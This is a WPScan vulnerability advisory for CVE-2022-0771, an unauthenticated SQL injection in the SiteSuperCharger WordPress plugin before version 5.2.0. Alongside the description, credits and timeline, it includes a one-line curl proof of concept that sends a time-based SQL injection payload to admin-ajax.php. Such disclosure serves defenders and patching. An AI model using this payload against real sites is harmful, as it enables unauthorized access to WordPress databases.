WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

SiteSuperCharger < 5.2.0 - Unauthenticated SQLi

Description

The plugin does not validate, sanitise and escape various user inputs before using them in SQL statements via AJAX actions (available to both unauthenticated and authenticated users), leading to Unauthenticated SQL Injections

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data '0=images+UNION+SELECT+1+from+wp_users+WHERE+1+%3d+(SELECT+SLEEP(1))+--+&1=.&action=processGroup'

Affects Plugins

sitesupercharger
Fixed in version 5.2.0

References

CVE
CVE-2022-0771

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
6139e732-88f2-42cb-9dc3-42ad49731e75

Timeline

Publicly Published

2022-04-11 (about 1 years ago)

Added

2022-04-11 (about 1 years ago)

Last Updated

2022-04-17 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin